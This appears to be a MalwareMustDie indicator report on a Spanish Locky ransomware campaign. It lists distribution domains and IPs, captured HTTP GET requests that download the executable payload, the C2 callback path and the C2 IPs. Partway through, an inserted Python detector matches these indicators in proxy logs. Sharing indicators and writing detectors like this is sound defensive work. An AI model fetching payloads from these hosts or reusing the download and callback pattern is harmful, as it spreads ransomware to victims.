- #MalwareMustDie!!!
- // Campaign malvertisement screenshot:
- http://imgur.com/a/kXvah
- // Virus Total Info:
- 1. VT https://www.virustotal.com/en/file/5d6d2e0323c8a6efcb3a0fad39b5b17536c62e4cf2877a9e16150a9eb46baecb/analysis/
- 2. VT https://www.virustotal.com/en/file/51d7bba70a9ae3635c5b9bd17b2d8cb8df90ba57c8c84769d1a8296395c74dc0/analysis/
- 3. VT https://www.virustotal.com/en/file/1909ac8a0f17789632250a2b605b0f9140d8756d02003a50f8a5c24d8b3e2315/analysis/
- 4. VT https://www.virustotal.com/en/file/a9be0d13d4632a17d6d4a6b3ab2acce0be969e1b2cdd6a64952290b5c30fb97f/analysis/
- 5. VT https://www.virustotal.com/en/file/f8fc4b8a5f0e84fcf0fe24609a419968fb2e3bdb005a1c669c4e1eecd6bbb0d7/analysis/
- // Payload info
- This is the Spain campaign of Locky.
- The downloaders are fetching Locky from:
- rproducciones.com has address 217.76.130.137
- vonenidan.de has address 212.227.33.186
- il.seroca.com has address 46.226.47.21
- www.centroinfantilelmolino.com has address 217.76.156.98
- // The IPs are mostly located in Germany, not Italy; only one is in Spain.
- IP | rDNS | ASN | BGP prefix | AS name | CC | org domain | organization
- 217.76.130.137 | llge328.servidoresdns.net. |8560 | 217.76.128.0/19 | ONEANDONE | DE | arsys.es | Arsys Internet S.L.
- 212.227.33.186 | hosting.web.de. |8560 | 212.227.0.0/16 | ONEANDONE | DE | 1and1.co.uk | 1&1 Internet AG
- 46.226.47.21 | pl03.azamedia.net. & vz03.azamedia.net. |15699 | 46.226.40.0/21 | AS_ADAM | ES | azalorea.com | Azalorea S.L.
- 217.76.156.98 | slgc573.piensasolutions.com. |8560 | 217.76.128.0/19 | ONEANDONE | DE | arsys.es | Arsys Internet S.L.
- // PoC for the verdict is as follows:
- 1. VT https://www.virustotal.com/en/file/5d6d2e0323c8a6efcb3a0fad39b5b17536c62e4cf2877a9e16150a9eb46baecb/analysis/
- DOMAIN: rproducciones.com
- GET /987t5t7g HTTP/1.1
- Accept: */*
- Accept-Encoding: gzip, deflate
- User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)
- Host: rproducciones.com
- Connection: Keep-Alive
- 2. VT https://www.virustotal.com/en/file/51d7bba70a9ae3635c5b9bd17b2d8cb8df90ba57c8c84769d1a8296395c74dc0/analysis/
- DOMAIN: vonenidan.de
- GET /987t5t7g HTTP/1.1
- Accept: */*
- Accept-Encoding: gzip, deflate
- User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)
- Host: vonenidan.de
- Connection: Keep-Alive
- HTTP/1.1 200 OK
- Date: Wed, 18 May 2016 07:21:54 GMT
- Server: Apache
- Last-Modified: Mon, 16 May 2016 19:09:58 GMT
- ETag: "a00008e2-58e00-532fa5ee0f256"
- Accept-Ranges: bytes
- Content-Length: 364032
- Keep-Alive: timeout=2, max=200
- Connection: Keep-Alive
- Content-Type: application/x-dosexec
- MZ.......
- 3. VT https://www.virustotal.com/en/file/1909ac8a0f17789632250a2b605b0f9140d8756d02003a50f8a5c24d8b3e2315/analysis/
- HOSTNAME: il.seroca.com
- GET /987t5t7g HTTP/1.1
- Accept: */*
- Accept-Encoding: gzip, deflate
- User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)
- Host: il.seroca.com
- Connection: Keep-Alive
- 4. VT https://www.virustotal.com/en/file/a9be0d13d4632a17d6d4a6b3ab2acce0be969e1b2cdd6a64952290b5c30fb97f/analysis/
- DOMAIN: centroinfantilelmolino.com
- GET /987t5t7g HTTP/1.1
- Accept: */*
- Accept-Encoding: gzip, deflate
- User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)
- Host: www.centroinfantilelmolino.com
- Connection: Keep-Alive
- 5. VT https://www.virustotal.com/en/file/f8fc4b8a5f0e84fcf0fe24609a419968fb2e3bdb005a1c669c4e1eecd6bbb0d7/analysis/
- DOMAIN: vonenidan.de
- GET /987t5t7g HTTP/1.1
- Accept: */*
- Accept-Encoding: gzip, deflate
- User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)
- Host: vonenidan.de
- Connection: Keep-Alive
- HTTP/1.1 200 OK
- Date: Wed, 18 May 2016 07:11:25 GMT
- Server: Apache
- Last-Modified: Mon, 16 May 2016 19:09:58 GMT
- ETag: "a00008e2-58e00-532fa5ee0f256"
- Accept-Ranges: bytes
- Content-Length: 364032
- Keep-Alive: timeout=2, max=200
- Connection: Keep-Alive
- Content-Type: application/x-dosexec
- MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
- // CNC callback
- Method: POST HTTP/1.1
- Path: /userinfo.php
- // IP Info
- 149.202.109.202
- 188.127.231.124
- 176.53.21.105
- 217.12.199.151
- // IP origin:
- IP | rDNS | ASN | BGP prefix | AS name | CC | org domain | organization
- 149.202.109.202 | |16276 | 149.202.0.0/16 | OVH | FR | ovh.com | OVH SAS
- 188.127.231.124 | |56694 | 188.127.231.0/24 | DHUB | RU | oversun.ru | Oversun Ltd
- 176.53.21.105 | . |197328 | 176.53.21.0/24 | INETLTD | TR | turkrdns.com | Radore Veri Merkezi Hizmetleri A.S.
- 217.12.199.151 | annakoval.itldc-customer.net. |15626 | 217.12.192.0/19 | ITLAS | UA | itl.net.ua | ITL Company
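As an added defender-side example (not part of this paste), the two stages captured above, the GET of the payload and the POST callback to the CNC, can be matched in proxy logs. The log line layout below is constructed for the example; the hosts, IPs and paths are the ones listed in this paste, and the code also flags a PE served on the campaign path from a host that is not yet on the list.

```python
import re

# Indicators from this paste: payload hosts, C2 IPs and the two URI paths.
LOCKY_DIST_HOSTS = {"rproducciones.com", "vonenidan.de", "il.seroca.com",
                    "www.centroinfantilelmolino.com"}
LOCKY_C2_IPS = {"149.202.109.202", "188.127.231.124", "176.53.21.105", "217.12.199.151"}
DOWNLOAD_PATH = "/987t5t7g"      # GET path used by all five downloaders
C2_PATH = "/userinfo.php"        # POST path of the CNC callback

# Assumed proxy log layout (constructed for this example, not the paste's):
# <client> <method> <host> <path> <status> <content-type> "<user-agent>"
LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) (\S+) "([^"]*)"$')

def classify(line):
    """Return a verdict tag for one log line, or None if nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return None
    _client, method, host, path, _status, ctype, _ua = m.groups()
    # Stage 1: downloader fetching the payload. Matches a known host on the
    # campaign path, or any host answering that path with a PE (x-dosexec),
    # which catches hosts not yet listed. The IE7 User-Agent in the captures
    # is too generic to be a trigger on its own, so it is not used.
    if method == "GET" and path == DOWNLOAD_PATH and (
            host in LOCKY_DIST_HOSTS or ctype == "application/x-dosexec"):
        return "locky-download"
    # Stage 2: the installed sample calling home to a known C2 IP.
    if method == "POST" and path == C2_PATH and host in LOCKY_C2_IPS:
        return "locky-c2-callback"
    return None

def scan(lines):
    """Return (client, host, tag) for every line that matched."""
    hits = []
    for line in lines:
        tag = classify(line)
        if tag:
            m = LOG_RE.match(line)
            hits.append((m.group(1), m.group(3), tag))
    return hits

# Constructed sample log: one infected client running both stages, one clean
# client, and one client fetching the campaign path from an unlisted host.
UA = '"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0)"'
SAMPLE_LOG = [
    f"10.0.0.5 GET vonenidan.de /987t5t7g 200 application/x-dosexec {UA}",
    f"10.0.0.5 POST 149.202.109.202 /userinfo.php 200 text/html {UA}",
    '10.0.0.7 GET www.example.com /index.html 200 text/html "Mozilla/5.0"',
    f"10.0.0.9 GET cdn.example.net /987t5t7g 200 application/x-dosexec {UA}",
]
```

Running `scan(SAMPLE_LOG)` yields three hits: both stages from 10.0.0.5 and the unlisted-host download from 10.0.0.9; the clean client is not reported.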
- // DGA callback:
- ---
- MalwareMustDie, NPO - the team.